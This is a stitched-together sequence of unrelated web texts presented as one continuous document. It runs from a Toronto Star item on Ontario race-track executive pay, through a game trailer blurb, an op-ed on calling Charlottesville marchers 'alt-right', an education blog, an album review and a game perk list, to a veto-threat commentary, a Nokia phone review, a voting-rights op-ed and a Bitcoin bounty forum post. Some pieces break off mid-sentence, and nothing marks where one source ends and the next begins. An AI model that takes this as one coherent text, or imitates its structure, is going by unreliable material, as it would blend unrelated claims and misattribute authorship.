Nick Eaves, president and CEO of Woodbine Entertainment Group, Canada's premier horse racing business, earned more than $700,000 as the province's highest paid race track executive in 2014, according to a salary disclosure list posted by the sport's regulator. Similar to Ontario's annual sunshine list for public sector employees, the Ontario Racing Commission — which regulates horse racing in the province — discloses its own list of race track employees who make $100,000 or more.
Woodbine Entertainment CEO Nick Eaves, who is stepping down, was the highest paid man executive in Ontario's horse racing industry last year. ( Vince Talotta / Toronto Star )
As of 2014, race track operators receiving money through transfer payment agreements with the province had to disclose salaries of personnel earning $100,000 or more to the Ontario Racing Commission as a condition of obtaining funding. That funding flows through the commission to the race tracks from the province's Horse Racing Partnership Plan. Eaves, who is scheduled to step down from his Woodbine job Tuesday, earned $721,125, according to the commission list, which includes a total of 33 Woodbine Entertainment Group employees. Other top Woodbine earners include Sean Pinsonneault, executive vice president and chief operating officer, at $383,438; William Ford, vice president, general counsel and corporate secretary, at $376,250; Jim Lawson, chairman, at $366,000; James Martin, executive vice president, at $332,188.
Article Continued Below
There were nine from other Ontario race tracks on the commission's list. They include: Flamboro Downs' Bruce Barbour, who earned $218,855 as executive director of racing operations (Ontario); Ottawa's Rideau Carleton general manager Jean Larose, who collected $150,000; and at Fort Erie, Ontario's only other thoroughbred track, Tom Valiquette received $140,538 as chief financial officer. The Ontario Racing Commission posted its list Monday afternoon. In 2012, the province announced it would end a slot machine revenue-sharing agreement it had with horse racing track operators. Kathleen Wynne's government soon after agreed to provide upwards of $400 million in public funding over five years to assist the sport in becoming self-sustainable. As an example of Horse Racing Partnership Plan funding, Woodbine Entertainment Group received about $61 million in 2014 to run its standardbred and thoroughbred operations at Woodbine and Mohawk race tracks, money to be used for purses.
Read more about:
Here's something you're seeing here first. A new trailer for Serious Sam 3 BFE, following the life of one of the game's many headless kamikazes. Because that's the correct way to trail an old-school shooter – a documentary about a headless man with bombs for hands. We're all agreed on that. So head below to take a world exclusive peek at the new video.
A leaked document explains the purpose of the video:
“In preparation for the launch of Serious Sam 3: BFE, Mental's Horde (NYSE: MNTL) has announced a plan to fill over five billion henchmen positions that have opened up since the release of Serious Sam HD. While admitting company morale is low after a decade of defeat at the hands of Serious Sam representatives, the Horde have confirmed that the organization will be redoubling their efforts to take down their longtime nemesis.”
The company's HR director apparently said,
Neo Nazis, Alt-Right, and White Supremacists encircle counter protestors at the base of a statue of Thomas Jefferson after marching through the University of Virginia campus with torches in Charlottesville, Va., USA on August 11, 2017 (Photo by Shay Horse/NurPhoto via Getty Images)
In the age of social media—when cowardly trolls and bigoted bots tend to hurl insults from the safety of anonymous online profiles—the white supremacists, neo-Nazis, and racist demonstrators in Charlottesville did not bother to hide their identities.
They crossed the University of Virginia campus to demand attention with their heads held high, a horde of men whose faces were lit by the torches they carried—a scene intended to evoke and glorify the cruelties of fire-wielding lynch mobs and cross-burners of the Ku Klux Klan.
Yet many of these marchers might bristle at being called Klansmen, per se, counting themselves among some differently-named herd of hateful racists. In recent years, American racists have taken pains to come up with new terminology to self-identify with—such as the so-called “alt-right,” a phrase credited to avowed racist Richard Spencer, who famously celebrated Trump's victory with Nazi salutes.
TRENDING: Photographer behind graphic Charlottesville image recounts near-death experience
The media should have had the same reaction to “alt-right” as we did to Kellyanne Conway's insistence on “alternative facts”—utter disbelief and amusement at the idea that we couldn't see a lie for a lie.
But the term didn't die on the fringes of society, instead finding its way into our mainstream. In news coverage, the phrase “alt-right” shows up, often used as shorthand in headlines or a catch-all term for the many types of hate groups that traveled to Charlottesville from different parts of the country. The weekend's events were called “Unite the Right” because while these groups share many basic tenets, America's hatemongers are splintered into more than 900 groups now.
Trump — again — fails to condemn alt-righthttps://t.co/hKKczrvB9b Sign up for CJR 's daily email — Karen (@kyungkarenmend1) August 14, 2017
A list of all the ways Trump and his advisers have supported the white supremacist alt-right: https://t.co/eYT3WvHs3j pic.twitter.com/HSKPZPkX35 — Slate (@Slate) August 14, 2017
How did such a basic bigot as Spencer—dubbed a “kind of professional racist in khakis” by advocates—redefine overt racism and white supremacy as if they were new? Until this weekend, many Americans and media makers dismissed them as a small group in a dark corner of the internet. But with three dead and more than a dozen others wounded in Charlottesville, white supremacists have unapologetically brought their beliefs and desired violence into the light—we all see it more clearly now. It's time for media to reframe coverage to clearly relate this fresh outburst of hatred to America's long history of racial violence.
In the Associated Press' Stylebook, the term “alt-right” is defined as “a name currently embraced by some white supremacists and white nationalists“—which, in itself, paints the term as a trendy thing to call an age-old American problem. Somehow, they were allowed to rework their public personas with a term that makes them sound a little edgy, like an alt-weekly or alt-rock.
In the already outdated 2017 edition, the AP style guide offers a warning to avoid using alt-right without defining it, or using a broad brush “because it is not well-known.” It's time for AP—and newsrooms coast to coast—to stop using such a vague term.
Notably, the AP adds: “the term may exist primarily as a public relations device to make its supporters' actual beliefs less clear and more acceptable to a broader audience.” What an odd suspicion to note, all while allowing the phrase to be used. Journalists should ask: Does our continued use of the phrase “alt-right” amount to allowing ourselves to be spun by bigots? Can't we just call a racist?
I've thumbed the Stylebook for many years, and I've never seen a phrase described quite like this, or a group so nascent as to be “not well-known” and yet allowed to define itself in a manner that distances itself from typical bigots.
One initial reason for the distinction, that most so-called alt-right groups operate primarily online and through memes, no longer exists. The alt-right is on the streets and hiding in plain sight with a new nickname.
Pundits, please stop dignifying racists, fascists & white supremacists by calling them what they want to be called — "alt-right." — Michael McFaul (@McFaul) August 13, 2017
Please stop calling them alt-right. That's their euphemism. If they chant "blood and soil" they're neo-nazis and/or white supremacists. https://t.co/q072ip8AaD — Joseph Brown (@Joseph_M_Brown) August 12, 2017
I really wish y'all would stop calling them Nazis and alt-right, and call them white supremacists. Hell, call them Confederates. — Cocky McSwagsalot (@MoreAndAgain) August 12, 2017
As journalists, is it better to be able to properly define what specific type of bigotry our interview subjects support? In theory, yes. But we must put truth ahead of rebranding of the same old hatreds. We know spin when we see it. We already had words for white men who believed their rights were more important than anyone else's. We have to be brave enough to use them.
The rebranding of white supremacy knows no bounds. Consider this statement from one of the white supremacists whose picture was circulated on social media this weekend: “I'm not the angry racist they see in that photo,” Peter Cvjetanovic, 20, told a local news station in his home state of Nevada.
In said photo, Cvjetanovic is illuminated by torchlight, wearing a white nationalist symbol on his shirt, and he is visibly giving full-throated support during a march where Nazi slogans and white supremacist chants were being hollered by hordes of white men.
Like the others, he didn't wear a Klansman's hood or hide his identity in any way.
Peter Cvjetanovic tells KTVN "I'm not the angry racist they see in that photo." Kid, you're the Hazel Bryan of 2017. https://t.co/v2QYtMcwpt pic.twitter.com/0g2Wic4a7u — Yes, You're Racist (@YesYoureRacist) August 13, 2017
Even in a clear image of an angry racist, the subject implores viewers to ignore undeniable proof. Despite his attempt to spin, every thinking adult knows what it means to take up torches to march through the South in service of white power.
After watching the chaotic violence this weekend, it's clear: It doesn't matter if perpetrators call themselves neo-Nazi, or white separatist, or European “Identitarian” (as the symbol on Cvjetanovic's shirt indicates he is). It matters that we call racism and white supremacy by the terms best understood by our readers and our history. These groups may take up different names and pretend that they are new, novel, or special—but they all unapologetically stoke racial violence and promote white supremacy.
Reminder to journalists: white nationalism is bad. Trying to pull "both sides" on this subject IS an editorial stance—and not a good one. — Jack Jenkins (@jackmjenkins) August 12, 2017
Journalists can't afford to assign blame equally or pretend a bigot's motive is anything short of horror.
ICYMI: “If you're telling me his secrets, you're probably telling him mine. Now I know never to trust you.”
The bigoted displays and casualties witnessed this weekend in Charlottesville should sound the alarm in newsrooms across the country. The caution that often guides coverage choices dealing with hate groups is that news organizations cannot ignore violence or mayhem, but if no injury or damage is recorded the tendency is to ignore the actions of white terrorists. This is a dangerous backseat to take. As NPR's David Folkenflik said this week on Reliable Sources, it's important to frame coverage carefully so as not to overblow political influence. “I think there's an obligation to cover this but—it's not a binary choice, folks. We have to make subtle distinctions and smart choices in the way we do this,” Folkenflik said.
About to join CNN's @ReliableSources to talk about #Charolettesville coverage and then legal troubles at Fox News & other news orgs — David Folkenflik (@davidfolkenflik) August 13, 2017
Journalists cannot ignore that the larger picture is growing very grim. We may be telling the story of the modern demise of American tolerance. Violence has visited America repeatedly in the age of Trump, and unlike any of his predecessors, he is not interested in acting like a healer.
In the wake of blatantly racist violence, the American president initially blamed “many sides.”
The president of the United States has just failed to condemn white supremacy and neo-Nazi ideology. — Jeffrey Goldberg (@JeffreyGoldberg) August 12, 2017
Reporter asks Trump if he wants support of white nationalist, Trump walked off without answering. — Jared Yates Sexton (@JYSexton) August 12, 2017
At a certain point, we must all pause to ask: How is it that the only time our mouthy, straight-shooting, politically incorrect president seems to bite his tongue is when he is called upon to denounce white supremacists?
Does it have much to do with the fact that he lines the senior ranks of his administration with outspoken white supremacists, including Steve Bannon, formerly of Breitbart? And why is the administration so interested in curbing civil rights investigations and stopping funding for counter-white nationalism efforts?
These questions should trouble every American, and therefore be on the tip of the tongue of every journalist.
Until we get real answers, it's time to stop calling the president's favored political zealots by their favored self-identifying term. Journalists can't allow agents of hatred to set how they are defined. Their rebranding is little more than a cover-up for white supremacists to continue to commit foul acts of disrespect, intimidation, and violence.
ICYMI: How the ‘alt-right' checkmated the media
Has America ever needed a media watchdog more than now? Help us by joining CJR today
Shaya Tayefe Mohajer teaches journalism at the University of Southern California and works as a freelance journalist in Los Angeles. Previously, she was the news editor for TakePart.com and a reporter for The Associated Press. She is a graduate of New York University's masters program in journalism. Follow her on Twitter @Shaya_in_LA.
What other countries are really doing in education
By Valerie Strauss
My guest is Sean Slade, director of Healthy School Communities, part of the Whole Child Initiative at ASCD, an educational leadership organization.
By Sean Slade
Are we moving forward or chasing our own tail?
As the education reform debate continues – and is fueled by educational documentaries, educational forums and manifestos - let's take a moment to look at what these countries that we are propping up on a pedestal actually do.
For a while now we have been told that the United States is falling behind and that we must catch up. As Education Secretary Arne Duncan said last Aug. 25:
Today, there are many different approaches to strengthening the teaching profession -- both here in America and in countries that are outperforming us such as Finland and Singapore.
Our competitors in other parts of the world recognize that the roles of teachers are changing. Today, they are expected to prepare knowledge workers, not factory workers, and to help every child succeed, not just the [ones who are] easy to teach.
If this is our goal then – to catch up with the rest of world - how do we get there? A logical step would be to at least look closely at educational underpinnings of the countries most commonly cited - Singapore, Finland and Canada - and replicate.
Let's take a quick look at what these countries are actually doing:
SINGAPORE
Prime Minister Lee of Singapore (Aug. 29, 2010):
"I think we should do more to nurture the whole child, develop their physical robustness, enhance their creativity, shape their personal and cultural and social identity, so that they are fit, they are confident, they are imaginative and they know who they are.
"Every child is different, every child has his own interests, his own academic inclinations and aptitudes and our aim should be to provide him with a good education that suits him, one which enables him to achieve his potential and build on his strengths and talents. Talent means talent in many dimensions, not just academic talent but in arts, in music, in sports, in creative activities, in physical activities.
"We need to pay more attention to PE, to arts and music and get teachers who are qualified to teach PE and art and music.
"Give each one a tailored and holistic upbringing, so you get academic education, moral education, physical education, art and a sense of belonging and identity. We aim to build a mountain range with many tall peaks but with a high base, not just a single pinnacle where everybody is trying to scramble up one single peak. And we are realizing this vision."
FINLAND
Timo Lankinen, Director-General, Finnish National Board of Education (Sept. 13, 2010):
"We are not actually talking a lot about numeracy or literacy, the agenda for change is more about increase of the arts and physical education into curriculum, and the highlight of 21st century skills or as we call them citizen skills.
"We have relatively small class sizes so there is the possibility to individualize that attention for each child (sic) ability to personalize ... but we have questions to ask ourselves, do we enable teachers and students to flourish enough, for example giving them individual aspirations, and engaging students so that there will be more experiential learning.
"Looking at basic education and success in PISA [Program for International Student Assessment] results, we have to bear in mind that children also participate in early childhood education ... which is mainly through play and interaction.
"We will be great when every student and stakeholder says for example ‘I love school' and ‘I'm doing well in school' – so it's not only the subject knowledge we are seeking after."
CANADA
Dalton McGuinty, Premier of Ontario, Canada, Sept. 13, 2010:
"It doesn't matter how much money you invest, it doesn't matter how much you want change -- you won't get results unless you enlist your teachers in the cause of better education.
"We have worked hard to build a positive, working relationship with our teachers. We do not engage in inflammatory rhetoric. We do not use our teachers as a political punching bag. Public bickering undermines public confidence.
"Policy development and implementation happen in dialogue with our education partners.
"We don't always agree, but I am reminded of some of the best political advice I ever received. I got it from my mother, on my wedding day, she said: 'Whatever happens, keep talking.'
"So we keep talking to our teachers. I make it clear to them, and all our education partners, that our pursuit of improvement will be relentless. And there is no place to hide."
To summarize:
*More emphasis on the whole child, physical education, the arts, fostering talents and citizen skills.
*Less emphasis on numeracy and literacy or testing
*Greater respect for teachers, the profession and their role as partners in educational reform.
I wonder if these people would be interested in putting together a manifesto?
-0-
Follow my blog every day by bookmarking washingtonpost.com/answersheet. And for admissions advice, college news and links to campus papers, please check out our Higher Education page at washingtonpost.com/higher-ed Bookmark it!
For the Vinyl Half Speed Mastered edition I can only give 2.5 stars maximum, ABBA and the music on this album is 4.5. The mastering is quite nice, not perfect. They probably used the original vinyl LP masters for this as I recognise some tape issues. What is the point of carefully cutting the stamper positive at Half Speed, when the manufactures press the records off centre? I've tried two copies from different suppliers and they are both the same. Both 2nd LPs even have an almost identical edge warp that creates some LF noise at the start of sides C & D. Side 3 is the worst on my two copies. The solution is to buy a small round file and file the hole out to correct the off centre pressing. Then mark the label to position the record centred on the spindle. Otherwise the pitch will wave around / wow and flutter..... The best way to listen to this album is to compile your own tracks from various compilations to avoid the tape issues and poor mastering from the CD releases.
The Ego Grid in Defiance
These are the list of perks in Defiance:
(Click on each perk for more detailed information)
Aggressive Defense
Ambush
Ammo Thief
Assassin's Cache
Blast Shield
Bloodlust
Cellular Armor
Combat Medic
Crash Test Dummy
Deadly Cascade
Detachment
Displacement Field
Efficient Projection
Emergency Ammo
Endurance Runner
Energy Leech
Energy Surplus
Escape Artist
Execution
Explosive Onslaught
Failsafe
Feedback
Follow-through
Fortified Stance
Fortitude
Guardian Angel
Gunslinger
Height Advantage
Hell on Wheels
Hunker Down
Hunter's Stance
Hyperactive
Implosion
In the Trenches
Infiltrator
Insult to Injury
Intimidation
Juggernaut
Just Reward
Kill or Be Killed
Killing Machine
Killing Spree
Kinetic Transfer
Lifesaver
Longshot
Loyalty
Mad Bomber
Materialize
Nerves of Steel
Nothing to Lose
One for All
Overload
Phoenix Boost
Pinata
Predator
Preparedness
Pumped Up
Quick Charge
Quickening
Rear Guard
Regeneration
Risk Taker
Samaratin
Scavenger
Second Wind
Self-Medicated
Sensor Sweep
Shadow's Core
Shadowed Strike
Shock Trooper
Single Minded
Sonic Strike
Sucker Punch
Survival Instinct
Thick Skinned
Time Out
Tunnel Vision
Turn the Tide
Unfinished Business
Wrecking Ball
Skill Calculator [ edit ]
There is an Ego Calculator for Defiance here:
http://defiance-central.com/ego-calculator/
The Administration just issued its official position on the House Armed Services Committee Defense Authorization bill. In it, Obama issues veto threats on several issues, including an extra engine for the Joint Strike Fighter and limits on START nuclear reductions (but not, it must be said, on any delay of DADT repeal, though he did oppose efforts to delay repeal).
Most interesting, though, is the veto threat on the forever war (see Ben Wittes for a good summary of most of these sections):
Detainee Matters: The Administration strongly objects to section 1034 which, in purporting to affirm the conflict, would effectively recharacterize its scope and would risk creating confusion regarding applicable standards. At a minimum, this is an issue that merits more extensive consideration before possible inclusion. The Administration strongly objects to the provisions that limit the use of authorized funds to transfer detainees and otherwise restrict detainee transfers and to the provisions that would legislate Executive branch processes for periodic review of detainee status and regarding prosecution of detainees. Although the Administration opposes the release of detainees within the United States, Section 1039 is a dangerous and unprecedented challenge to critical Executive branch authority to determine when and where to prosecute detainees, based on the facts and the circumstances of each case and our national security interests. It unnecessarily constrains our Nation's counterterrorism efforts and would undermine our national security, particularly where our Federal courts are the best – or even the only – option for incapacitating dangerous terrorists. For decades, presidents of both political parties – including Presidents Ronald Reagan, George H.W. Bush, Bill Clinton, and George W. Bush – have leveraged the flexibility and strength of our Federal courts to incapacitate dangerous terrorists and gather critical intelligence. The prosecution of terrorists in Federal court is an essential element of our counterterrorism efforts – a powerful tool that must remain an available option. The certification requirement in section 1040, restricting transfers to foreign countries, interferes with the authority of the Executive branch to make important foreign policy and national security determinations regarding whether and under what circumstances such transfers should occur. The Administration must have the ability to act swiftly and to have broad flexibility in conducting its negotiations with foreign countries. Section 1036 undermines the system of periodic review established by the President's March 7, 2011, Executive Order by substituting a rigid system of review that could limit the advice and expertise of critical intelligence and law enforcement professionals, undermining the Executive branch's ability to ensure that these decisions are informed by all available information and protect the full spectrum of our national security interests. It also unnecessarily interferes with DoD's ability to manage detention operations. Section 1042 is problematic and unnecessary, as there already is robust coordination between the Department of Justice, the Department of Defense, and the Intelligence Community on terrorism-related cases, and this provision would undermine, rather than enhance, this coordination by requiring institutions to assume unfamiliar roles and could cause delays in taking into custody individuals who pose imminent threats to the nation's safety. If the final bill presented to the President includes these provisions that challenge critical Executive branch authority, the President's senior advisors would recommend a veto.
While I would have preferred a full-throated rejection of the forever war, this is a neat approach that, given realistic assumptions of what we can expect from Obama, pushes back in an interesting fashion.
What the Administration has done is list five different provisions:
1034: redefining the AUMF to be a forever war (and also giving the President the power to detain people in the forever war)
1039: barring the use of funds for civil trials
1040: imposing certification requirements on the Secretary of Defense to transfer detainees
1036: codifying an indefinite detention system, with fewer detainee rights than Obama's own EO calls for
1042: requiring the Attorney General ask permission from the DNI and Secretary of Defense before prosecuting “terrorist offenses” in civilian courts
And then said, generally, if “these provisions that challenge critical Executive branch authority” remain in the bill, his advisors would recommend a veto.
Of course, on its face, the forever war section doesn't “challenge critical Executive branch authority,” unless you argue that by granting the President the ability to constantly redefine this war, you're infringing on his authority to do so without a grant of such authority from Congress. That's not how I understand the Constitution, but you can never be too sure any more about the people who run our war machines.
Nevertheless, Obama is including that with a bunch of other restrictions (some of which passed in similar form on other laws, to which he responded with a non-signing statement signing statement, and some of which are new), so as to be able to say his opposition is grounded in separation of power concerns rather than the judgment that Congress shouldn't mandate a forever war the President hasn't asked for.
Again, I'd rather have a loud denunciation of the forever war. I'd rather have a clear argument about how we will start moving away from a war footing in our opposition to terrorism.
But I'm not going to get that, so I'll take this graceful veto threat instead.
Review Nokia's marketing department is comparing its new imaging champ, the Lumia 1020 smartphone, to digital SLR cameras. That's just silly.
But what the Lumia 1020 can lay claim to is that it takes the best photos of any current modern smartphone – by a clear head and shoulders. And Nokia has packaged it into a modern phone, rather than an exhibit at hardware manufacturer's freak show.
It isn't perfect, and it could use a few tweaks. But as it stands, considering that the competition from Apple, Samsung and HTC's smartphones is strong, this is impressive. Even against Samsung's Frankenstein-like hybrid, the S4 Zoom, which clumsily grafts the optical lens from a point-and-shoot digicam onto a budget Android smartphone. Now, perhaps for the first time, a phone can take photos with a level of richness and detail good enough for posterity – for the mantelpiece or a family album – rather than for Facebook.
What you really need to know is: is it any good as a phone, particularly if you're coming from a rich ecosystem like iOS or Android? And what exactly does this much vaunted 41 Megapixel monster deliver? Obscure geekspeak, or real world results?
Before we do let's briefly run over the device and the accessories.
How is this different?
The Lumia 1020 actually integrates two imaging technologies: a highly novel one developed by Nokia over several years, and one borrowed from dedicated cameras but miniaturised into a phone. Both are unique to Nokia. However, both have appeared before, never together, and the combined result is amazingly, smaller than the predecessors.
The first is an unusual approach that uses silicon and software to compensate for the physical limitations of a short focal length and small aperture. Instead, a huge sensor captures many more pixels than you need, and then software algorithms distil this down to a five-megapixel image of great richness and detail.
The sensor is 41 megapixels, creating as a first step a 34 megapixel image; the other pixels being put to good use interpolating the image. For a technical explanation, see here. The phone actually keeps a master copy of the image at full resolution, and presents the five-megapixel image to you right away for editing and sharing. This smaller, distilled image is also uploaded to SkyDrive.
The second technology appeared last year - and brings the optical image stablisation (OIS) found in dedicated cameras to a phone. This first appeared on the Lumia 920 and 925 models, and it allows for very stable video recording, and some startling photos in poor light, as the shutter can be exposed for longer than it would otherwise be. In the 1020, the entire imaging module itself is mounted on ball bearings (rather than on gyroscopes as in the 920 and 925), and the camera compensates for a shaky hand or wobbly undercarriage in real-time.
The results of the gazillion-pixel sensor aren't as huge as you might fear. Here's the image folder viewed in Windows Explorer - the smaller image varies from 1.5MB to 2.7MB in size, while the “master” doesn't really exceed 9MB.
Your phone won't get full in a hurry from taking lots of pictures - it's HD video recording that's the real hog. You can't actually access the “master copy” from the phone, but in practice, you don't need to: the five-megapixel is superior every time.
The 1020 is the second phone on the market to feature the huge sensor developed by Nokia.
Remarkably Nokia achieves all this in a fairly slimline package: the design goal for the imaging unit was 10mm, and the phone is 10.4mm thick; the imaging unit protrudes by around 3mm. Rather, the mechanics are spread laterally, giving it a very distinctive look. Nokia had to invent a new kind of sensor, a type of Xenon flash, and new manufacturing techniques to make all this possible. Yet the proof's is in the pudding, not the specs. Before taking it through its paces, we'll briefly review the build and software.
Brennan Center for Justice The states shown in light red had voting restrictions in place for the 2012 election. Those in darker red had restrictions in place for the 2016 election. States shown in the darkest red have put voting restrictions in place since last November's election.
For all its prestige, the U.S. Supreme Court has issued some highly questionable rulings in recent years. Its 2010 decision that corporations are people still leaves many citizens scratching their heads. Comedian Jon Stewart made more sense when he noted wryly that corporations can't be people since they have an “inability to love”.
Nevertheless, the Court's 5-4 ruling to personify corporations remains the law of the land.
It is another ruling, however, that best demonstrates how naïve the Justices can be about the America that exists outside their chambers. In 2013, the Court struck down a critical provision of the Voting Rights Act, the law Congress enacted in 1965 to prevent states from racial discrimination in their election rules.
President Lyndon Johnson and Congress approved the Act two years after Martin Luther King's “I Have a Dream” speech and one year after Congress passed the Civil Rights Act. Several southern states were still actively engaged in racial discrimination by levying poll taxes and requiring literacy tests. But what drew the nation's full attention was violence, including murder, against volunteers who helped register African Americans and other minority voters. Congress noted that there was entrenched racial discrimination in state voting rules and called them “an insidious and pervasive evil which had been perpetuated in certain parts of our country through unremitting and ingenious defiance of the Constitution”.
The Act required several states with an especially bad history of racial discrimination to obtain approval by the Attorney General of the United States for any changes they wanted to make in their voting laws. But by declaring part of the Act unconstitutional in 2013, the Supreme Court made this requirement unenforceable.
Writing for the majority, Chief Justice John Roberts reasoned that in the half-century since passage of the Act “things have changed dramatically” in the South. While no one doubts that voting discrimination still exists, Roberts explained, more African Americans than white Americans were voting in several of the states covered by the law and the racial gap in voter registration had narrowed. Speaking for the Court's minority, Justice Ruth Bader Ginsburg warned that previous types of discrimination had merely been replaced by more subtle methods such as gerrymandering.
So, who was correct? Is the racially motivated rigging of voting rights a thing of the past? Or is the right to vote still being sabotaged by some of our states? Consider the following data from the Brennan Center for Justice, one of America's most respected watchdogs on voting rights:
As of last May, at least 99 bills in 31 states had been introduced to restrict access to registration and voting.
Five states – Iowa, Arkansas, North Dakota, Indiana and Georgia ― had enacted bills to make it harder for citizens to vote. Three additional states enacted voting restrictions during the 2015-2016 period.
Bills to make it harder to register had been introduced in 23 states as of last May.
Most of the states that have passed or are trying to pass new voting restrictions are doing so in ways that courts previously prohibited.
Voter suppression strikes at the heart of democracy, but it has taken on partisan political dimensions. Traditionally, African Americans have tended to vote for Democrats. Thus, rules designed to deny racial minorities their voting rights increase the chances that Republicans will win elections. Along with other threats to the integrity of democracy — among them partisan gerrymandering and the corrupting influence of money in politics — voter suppression has weakened the two-party system and the checks and balances established by the Constitution. Republicans now control all three branches of the federal government; they control both the legislatures and governorships in 26 states.
In several states, the evidence shows that incumbent Republicans are actively engaged in trying to tilt elections in their party's favor. In Ohio, for example, Republican Secretary of State and gubernatorial candidate Jon Husted reportedly has “purged” more than 2 million voters from the state's roles since 2011. Purge notices are sent to residents who have moved or who have not cast a ballot for two years. If the residents don't respond, they are categorized as “inactive.” Mother Jones reports that in Ohio's three largest counties, voters in Democratic-leaning areas have been purged twice as often as people in Republican-leaning areas.
In Wisconsin, whose legislature passed a strict voter ID law in 2011, Mother Jones found that black voters were roughly 50 percent more likely than whites to be blocked from voting because they didn't have the required identification. Blacks were less likely to drive and to have drivers' licenses, and they were less likely to have other required documents, especially when they had moved to Wisconsin from other states.
After conducting a survey of registered voters in Wisconsin, political scientists Kenneth Mayer of the University of Wisconsin-Madison concluded, “we have hard evidence there were tens of thousands of people who were unable to vote because of the voter ID law.” That was more than enough votes to change the outcome of the presidential vote in Wisconsin last November.
There is some good news. The Brennan Center says more than 530 bills had been introduced in 45 state legislatures to expand voting access. Some state laws to suppress voters have been challenged in lawsuits that are now before the U.S. Supreme Court.
But the larger question goes back to the Roberts ruling. Has racial discrimination largely disappeared from the right to vote and for that matter, from society at large? The bad news appears to outweigh the good. Since last fall's election, white supremacists and neo-Nazis have come out of the shadows to march openly in our streets. There are clear racial dimensions to the controversy over statues honoring leaders of the confederacy. Black Lives Matter has been interpreted as a racial rather than humanitarian movement. There are disturbing racial undertones, too, in Donald Trump's presidency including his methodical attempt to destroy the legacies of the nation's first Black president; his hesitance to condemn white supremacists for the violence that killed a woman in Charlottesville, Virginia; his attempts to restrict travel into the U.S. by certain religious and ethnic groups; his cancellation of DACA, the program that allowed nearly 800,000 undocumented immigrants to stay in America because they had been brought into the country as children; and his plan to build a wall to keep illegal Mexican immigrants out, an idea that has less to do with effective border control than with Trump's appeal to those who object to immigration of virtually any kind.
In 2015, several members of Congress, led by civil rights icon Rep. John Lewis of Georgia, introduced legislation to repair the Voting Rights Act by requiring that all states obtain federal approval before creating laws that make it more difficult to register and vote or that gerrymander congressional and legislative districts. The bill did not pass, but its sponsors hoped it might at least inspire a grassroots movement among Americans who believe that all citizens regardless of race, religion, political affiliation or place of residence should have an equal opportunity to participate in elections.
To a degree, that is coming to pass. Scores of organizations in the United States, some old and some new, are working quietly to fix our broken democracy. At Oberlin College in Ohio last week, some of the nation's leading thinkers about democracy and its challenges kicked off a series of five conferences that will be held in different cities to diagnose and fix what is broken. The organizations need more resources, but even if they obtain them, their work will not be enough. The revival of America's democracy must become a nonpartisan national crusade to restore and protect the right to vote. The objective should be the suppression of voter suppression in next year's midterm elections, in the 2020 presidential election, and beyond.
CIYAM
Offline
Activity: 1890
Merit: 1000
Ian Knowles - CIYAM Lead Developer
LegendaryActivity: 1890Merit: 1000Ian Knowles - CIYAM Lead Developer 20 BTC bounty for first AT *atomic cross-chain transfer* with Script clone October 17, 2014, 08:18:41 AM
Last edit: November 13, 2014, 04:51:56 PM by CIYAM #1
Hash: SHA1
To win: Be the first Script (i.e. Bitcoin or Litecoin) clone to implement a *working version* of AT on mainnet which will be used to
perform a successful "atomic cross chain transfer" with Qora (which will be implementing AT soon).
This will need to be performed within 1 month of Qora going live with AT (and if that doesn't happen within 3 months then
this bounty will be called off).
Bounty Address:
I created AT (
on some non-Bitcoin based blockchains, however, one of the *killer apps* for AT (atomic cross-chain transfer - at least IMO) really needs to
work with Bitcoin/Litecoin clones as soon as possible (and down the track there might be bounties offered for other blockchain variations).
I am not really concerned if the coin is *popular* (use of some low value coin is okay as long as the network is stable enough to achieve the
desrired result) but it must be using its *mainnet* and it must successfully accomplish an "atomic cross chain transfer" between itself and Qora
using AT.
In order to help *get the ball rolling* I've already outlined a fairly simple approach that could be used to get AT working from Script
(
the available time).
Note that the code for the AT and AT API implementation must be "open source" using the MIT license (even if the rest of the code is not) and the final
say over whether the result to collect the bounty has been achieved will be up to myself.
If others want to add to this bounty then please send your BTC donation to the above address (note the following signed message to prove
that I own it and the GPG sig for this announcement).
1AKRYi1Q2LtEAnEYzjjZXkZRXL33RKA53e
This address is under my control!
G3YRn7DmQF0Jf5nBaJiw3SfMVroQzFB4N6X1AmNGmUYEaTCbfTOoZExiE2qAqHLdnA4IgIx+D+ccwVsjF3CWCuI=
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEYEARECAAYFAlRk4YIACgkQZPzMrvJlEZATTgCghPw1X2sGRbXLxOlObggxjn2/
vFQAnj/xMMk5pXr1kXOJB8HfkGOEUCPL
=73Pq
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1To win: Be the first Script (i.e. Bitcoin or Litecoin) clone to implement a *working version* of AT on mainnet which will be used toperform a successful "atomic cross chain transfer" with Qora (which will be implementing AT soon).This will need to be performed within 1 month of Qora going live with AT (and if that doesn't happen within 3 months thenthis bounty will be called off).Bounty Address: https://blockchain.info/address/1AKRYi1Q2LtEAnEYzjjZXkZRXL33RKA53e (this address is kept in cold storage)I created AT ( http://ciyam.org/at ) in order to allow any blockchain to have "Turing complete" txs easily added and it will soon be appearingon some non-Bitcoin based blockchains, however, one of the *killer apps* for AT (atomic cross-chain transfer - at least IMO) really needs towork with Bitcoin/Litecoin clones as soon as possible (and down the track there might be bounties offered for other blockchain variations).I am not really concerned if the coin is *popular* (use of some low value coin is okay as long as the network is stable enough to achieve thedesrired result) but it must be using its *mainnet* and it must successfully accomplish an "atomic cross chain transfer" between itself and Qorausing AT.In order to help *get the ball rolling* I've already outlined a fairly simple approach that could be used to get AT working from Script http://ciyam.org/at/at_script.html ) and I will offer my personal assistance (with technical questions) free of charge (assuming I havethe available time).Note that the code for the AT and AT API implementation must be "open source" using the MIT license (even if the rest of the code is not) and the finalsay over whether the result to collect the bounty has been achieved will be up to myself.If others want to add to this bounty then please send your BTC donation to the above address (note the following signed message to provethat I own it and the GPG sig for this announcement).1AKRYi1Q2LtEAnEYzjjZXkZRXL33RKA53eThis address is under my control!G3YRn7DmQF0Jf5nBaJiw3SfMVroQzFB4N6X1AmNGmUYEaTCbfTOoZExiE2qAqHLdnA4IgIx+D+ccwVsjF3CWCuI=-----BEGIN PGP SIGNATURE-----Version: GnuPG v1.4.9 (MingW32)iEYEARECAAYFAlRk4YIACgkQZPzMrvJlEZATTgCghPw1X2sGRbXLxOlObggxjn2/vFQAnj/xMMk5pXr1kXOJB8HfkGOEUCPL=73Pq-----END PGP SIGNATURE-----
GPG Public Key | 1ciyam3htJit1feGa26p2wQ4aw6KFTejU With CIYAM anyone can create 100% generated C++ web applications in literally minutes.
